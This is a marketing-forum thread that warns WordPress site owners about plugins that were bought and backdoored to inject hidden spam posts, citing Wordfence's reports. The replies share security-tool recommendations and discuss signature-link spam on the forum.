34+ WordPress Plugins May Be Able To Add Spam Content To Your Blog - And Hide It From Your View!

22 replies
Hello Warriors.

Now, let me first say that the information I have received about this over the past few days has literally made me sick to my stomach.

The fact that people are so willing to do just about anything to make money online is scary, to put it mildly.

For those of you who have Wordfence installed on your WordPress sites (which should be all of you), you may very well be aware of this as the Wordfence team has been doing a great job trying to make everyone aware of this.

So here's the deal in a nutshell...

There is a person (or group of people) purchasing legitimate (and in some cases, very popular) WordPress plugins and altering the code to add a backdoor that would allow them to add spam articles to any sites that had the plugin installed.

According to the two articles from the Wordfence blog (that I have to links to below), these spam articles were being used to promote shady businesses such as payday loan companies, etc. What's even more outrageous, however, is that Wordfence uncovered information that the companies that were being promoted using the malicious spam code were companies that are/were actually owned and run by the SAME person who injected the malicious code into the plugins!

The information that Wordfence currently has estimates that there may be as many as 34 plugins or more that have the ability to post to your blog, edit posts, remove posts, replace your affiliate links with theirs, etc.

So far, Wordfence only knows of 4 plugins that are most likely owned by this group.

1. Display Widgets plugin - 200,000+ installs
2. Slimstat Analytics plugin - 100,000+ installs
3. 404 to 301 plugin - 100,000+ installs
4. Finance Calculator plugin - 600+ installs

The original creator of the "Finance Calculator" plugin has come out and said he has retaken control of the plugin and has since removed all malicious code. However, if it were me and I had any of those 4 plugins installed, I would definitely remove them and any trace of them from my WP install.

Also, keep an eye out for any posts appearing on your blog that you know you did not make. As the malicious code can somehow make the spam posts invisible to the site owner, I would maybe try to view your site through a proxy or VPN.

I'm not a programmer and have no idea how they can make the spam post invisible to the site owner, but I'm assuming it's something to do with blocking it from the owner's IP address. I could be very wrong about that. Maybe someone with programming knowledge could comment on that.

I would advise you to read these two articles in their entirety from the Wordfence blog as they have the complete story and much more information:

Initial post

https://www.wordfence.com/blog/2017/...dgets-malware/


Followup post exposing the spammer:

https://www.wordfence.com/blog/2017/...m-mason-soiza/
#add #blog #content #hide #plugins #spam #view #wordpress
Avatar of Unregistered
  • Profile picture of the author Brent Stangel
    Wow! I spent a lot of time on that page. Very interesting stuff!

    Thanks for posting this, CJ.

    Brent
    Signature
    Get Off The Warrior Forum Now & Don't Come Back If You Want To Succeed!
    All The Real Marketers Are Gone. There's Nothing Left But Weak, Sniveling Wanna-Bees!
    {{ DiscussionBoard.errors[11198681].message }}
  • Profile picture of the author Mark Singletary
    Even though I saw all that and am following it, I didn't think to post it here so thanks for sharing.

    I use WP-Slimstat and now not sure if I want to continue. I keep checking the site for an update on this part. He said he had reached out to the main programmer for verification.

    Mark
    {{ DiscussionBoard.errors[11198732].message }}
  • Profile picture of the author Brent Stangel
    Just for fun, I ran Sucuri's free scan: https://sitecheck.sucuri.net/

    I don't know how reliable their scan is and I'm certainly not saying this is the be all end all, but I found it interesting.


    So, what's a good firewall?

    Brent
    Signature
    Get Off The Warrior Forum Now & Don't Come Back If You Want To Succeed!
    All The Real Marketers Are Gone. There's Nothing Left But Weak, Sniveling Wanna-Bees!
    {{ DiscussionBoard.errors[11198747].message }}
    • Profile picture of the author .
      haha. I love this
      {{ DiscussionBoard.errors[11199134].message }}
  • Profile picture of the author jeandevenish
    What an excellent post!!!!
    {{ DiscussionBoard.errors[11199219].message }}
    • Profile picture of the author discrat
      Originally Posted by jeandevenish View Post

      What an excellent post!!!!
      Come on guys We can do better than this.
      What was excellent about his Post? That he gave a heads up to protect WP owners from malicious behavior ? Or possibly telling you that ALL of us should have Wordfence installed on our WP blogs ?

      Maybe take a look at this : https://www.warriorforum.com/off-top...rrggghhhh.html
      {{ DiscussionBoard.errors[11203763].message }}
      • Profile picture of the author jeandevenish
        For me, it was an eye opener, so I believe is excellent, maybe not for you, but surely for me.
        {{ DiscussionBoard.errors[11204529].message }}
  • Profile picture of the author Lena01
    Akismet. (794 total ratings) Akismet checks your comments and contact form submissions against our global database of spam to... ...
    Jetpack by WordPress.com. (1389 total ratings) ...
    WP Super Cache. (1275 total ratings) ...
    bbPress. (320 total ratings)
    {{ DiscussionBoard.errors[11199237].message }}
    • Profile picture of the author nicheblogger75
      Originally Posted by Lena01 View Post

      Akismet. (794 total ratings) Akismet checks your comments and contact form submissions against our global database of spam to... ...
      Jetpack by WordPress.com. (1389 total ratings) ...
      WP Super Cache. (1275 total ratings) ...
      bbPress. (320 total ratings)
      And this information​ pertains to this thread how?

      Actually, a better question is what in the world does it even mean?

      I really think it's time for WF to make ALL signature links a paid feature. This would weed out all of these "one line warriors" who obviously come here and leave lousy 4 or 5 word posts for the sole reason of getting sig link exposure.

      It's really taking away from the value of the forum and not only that, it's discouraging to all of the loyal members whose threads and posts are actually helping people and adding value.

      My guess is that charging for the PRIVILEGE of having a signature link would weed out all of the people who are here for the WRONG reason.

      It doesn't have to be a lot. Even $2 a month would weed out the sig spammers.
      {{ DiscussionBoard.errors[11200441].message }}
  • Profile picture of the author Eric Michalsen
    Great information here. Thank you for sharing.

    For those interested in hardening their WP site, I would recommend the video series at Lynda.com, Wordpress: Developing Secure Sites by Jeff Starr

    I have cleaned a lot of pharma hacked sites, but it was Jeff's videos that really helped me understand the process.
    {{ DiscussionBoard.errors[11199319].message }}
  • Profile picture of the author spearce000
    [DELETED]
    {{ DiscussionBoard.errors[11199325].message }}
    • Profile picture of the author Eric Michalsen
      ..or, just a thought, you could make if free for everyone, because it is free for everyone: https://perishablepress.com/6g/
      {{ DiscussionBoard.errors[11199333].message }}
    • Profile picture of the author nicheblogger75
      Originally Posted by spearce000 View Post

      FYI - my WordPress security WSO is now available FREE for War Room Members.. It has details about how to install a (free) firewall.
      All you need to do is install the free version of Wordfence and that provides a firewall.

      IMO, EVERYONE who has a WordPress site that they want protected should at least have the free version of Wordfence. If you are a serious blogger, you should have the upgraded version.

      It's absolutely the BEST for protecting your WP install.

      This is how many attacks on my site Wordfence has stopped this month alone so far:



      I'm not affiliated with Wordfence in any way. I just LOVE the plugin.

      I think you'd be crazy not to install it. It's one of the first things I do when I set up a new site.

      Also, their blog is incredible and jam packed with useful information that will help you to keep your site safe. And if for some reason you do get hacked (which I hope never happens), they can help you with that as well.

      2,000,000+ installs pretty much says it all I think. You can grab it for free here:

      https://wordpress.org/plugins/wordfence/
      {{ DiscussionBoard.errors[11199475].message }}
  • Profile picture of the author sirtrung
    [DELETED]
    {{ DiscussionBoard.errors[11200363].message }}
  • Profile picture of the author Claire Koch
    no thanks no want that. Was that too short? Sowwry. I just took a look at your one liners on this thread they don't have sig files.
    {{ DiscussionBoard.errors[11200456].message }}
    • Profile picture of the author nicheblogger75
      Originally Posted by Claire Koch View Post

      no thanks no want that. Was that too short? Sowwry. I just took a look at your one liners on this thread they don't have sig files.
      That's because they don't have enough posts yet. I think you need to have a certain number of posts before you can post a sig link. Also, the mods have removed a few of the posts (and rightly so).

      I'm sorry but I really feel that the WF needs to do something to discourage people from joining the forum and posting simply to get exposure for a sig link. The bottom line is that it's detrimental and lowers the quality of the forum posts.

      I'm not saying that charging a fee to have a sig link is the only solution. Maybe raising the number of posts to 100 before you can have a sig would be better, or only allowing people that have been here for less than a certain amount of time to link to a post inside the WF, such as a classified ad or WSO that they posted. This would require them to purchase a classified ad or a WSO post in order to have a sig if they have been here for less than, say 90 days.

      All I'm saying is something needs to be done because I'm getting sick of threads getting hijacked with posts like "Nice post," or " I didn't know that," or "That's interesting."

      Unless somebody can explain to me how posts like that help anybody or add any value to a thread, I see no reason for people to make them other than to get exposure for their sig links.
      {{ DiscussionBoard.errors[11200474].message }}
  • Profile picture of the author Ghost Shinobi
    Wowzers! Nice find and share - thanks for informing Warrior's about those dodgy plug-in's - IMHO: If you do not already follow or have an interest in "infosec", I recommend you read up and stay informed to find out about things like this and stay protected from it.

    It's a shame that shady people exist with their dodgy practices. Thanks for the expose on this one.

    Stay vigilant,
    Peace,
    Ghost Shinobi
    {{ DiscussionBoard.errors[11201016].message }}
  • Profile picture of the author hsahadath
    You have shared an amazing info. Thanks for helping us.
    Keep sharing.
    Mytechgoal.
    {{ DiscussionBoard.errors[11201226].message }}
    • Profile picture of the author nicheblogger75
      Originally Posted by hsahadath View Post

      You have shared an amazing info. Thanks for helping us.
      Keep sharing.
      Mytechgoal.
      Glad to help.

      The more I've been learning about the way the WordPress plugin repository works, the more I see how easy it can be manipulated.

      I did discover that WordPress frowns upon people selling the plugins they developed that are in the repository, and it's for the exact reason that this is how things like this happen.

      The way I understand it, when you submit a plugin there, it then becomes open source and anyone can take any plugin that's in there and work on it and even sell it if they like. They could even change the plugin considerably and submit it to the repository themselves as an entirely different plugin. This is all legal, because any plugin submitted to the repository becomes open source and anyone can work on it. That's the whole point of open source is for people to improve upon the software.

      However, if you were to do that and submit the plugin, it would start with zero installs and very little popularity.

      So, the reason why WordPress does not want a person who has a really popular plugin with thousands of installs to sell their account to someone else is because of what happens here.

      For example, let's say I contact a person who has a plugin in the repository that has a million installs. I then ask them if I can buy the plugin from them. Since it's open source, there's no reason to buy the plugin at all, but what the person is REALLY after is the access to the plugin with all of the installs. In other words, if they buy a plugin in the repository that has a million installs, they can then update it and add any code they want to it, and as soon as a person who has the plugin installed on their site updates it, then the NEW code is now on the plugin.

      It's somewhat hard to explain but the bottom line is that anybody who is offering to buy plugins from the original developer with access to the account may be looking to do so for the sole reason of injecting malicious code into it.

      It's perfectly legal to take any plugin in the WordPress repository and add to it and turn it into a whole new plugin. You can do the same thing with any theme in the repository.

      I wasn't aware of this until I did a bunch of research and learned that once you submit your plugin to the WordPress repository, there is no copyright on it. Anyone can take the plugin and add to it and then rename it and even sell it. As long as you have made changes to the code, I believe you can even upload it to the repository under your own account and give it a different name.

      I've heard that this is actually how a lot of people get ideas for new plugins that get sold. They take the framework from a plugin in the repository, give it to a developer, and pay them to add their ideas to it, then turn around and sell it as their own plugin.

      Maybe I'm wrong but from what I've been reading it seems like a lot of people do this and it's perfectly legal.
      {{ DiscussionBoard.errors[11201319].message }}
  • Profile picture of the author fantrom
    The most interesting fact is that it seems the spammer (Mason Soiza) was once an active member of the Warrior Forum:

    http://www.warriorforum.com/members/mason-soiza.html
    {{ DiscussionBoard.errors[11203386].message }}
  • Profile picture of the author Kay King
    I really think it's time for WF to make ALL signature links a paid feature.
    They are a paid feature now and have been for some time - amazing what $5 can buy these days....

    Also interesting is the increase in "lists" used as answers...been checking them out and find almost all are taken from other sites online - quora is a big fave of those folks.

    Sometimes I wonder if the internet will eventually die of suffocation from the amount of spam on it....
    Signature
    Saving one dog will not change the world - but the world changes forever for that one dog
    ***
    2024 Patriot's Award for Service to Veterans
    {{ DiscussionBoard.errors[11203711].message }}
  • Profile picture of the author nicheblogger75
    I didn't know that forum sigs were a paid feature. Maybe it only applies to people who joined after the rule went into effect. At any rate, maybe $5 isn't enough because it doesn't seem to deter the sig spammers at all.

    Anyhow, back on subject​...

    Wordfence has posted a third installment to their blog about this situation.

    Apparently they have confirmed a total of 9 plugins that were definitely compromised, but it appears most of them have been fixed and are now safe.

    Since the article is quite lengthy, I would advise reading it if you have time.

    Here's the link to the article:

    https://www.wordfence.com/blog/2017/...d-plugin-spam/
    {{ DiscussionBoard.errors[11203871].message }}
    • Profile picture of the author discrat
      Originally Posted by nicheblogger75 View Post

      I didn't know that forum sigs were a paid feature. Maybe it only applies to people who joined after the rule went into effect. At any rate, maybe $5 isn't enough because it doesn't seem to deter the sig spammers at all.
      Yeah they should make it an annual fee of $5 ( or $10) . One time fee won't cut it as far as weeding out the crap, imo
      {{ DiscussionBoard.errors[11204762].message }}
  • Profile picture of the author Mark Singletary
    If you have used one of these plugins in the past, are you going to continue using them?

    I use Slimstat on all my sites. It is supposedly clean now according to the latest update. But, if this was a big scam operation, wouldn't they be expected to say it was all clean now?

    No one is going to say, "Yep, our software has secret spamming stuff inside. Enjoy!" even if it does.

    Mark
    {{ DiscussionBoard.errors[11204761].message }}
Avatar of Unregistered

Trending Topics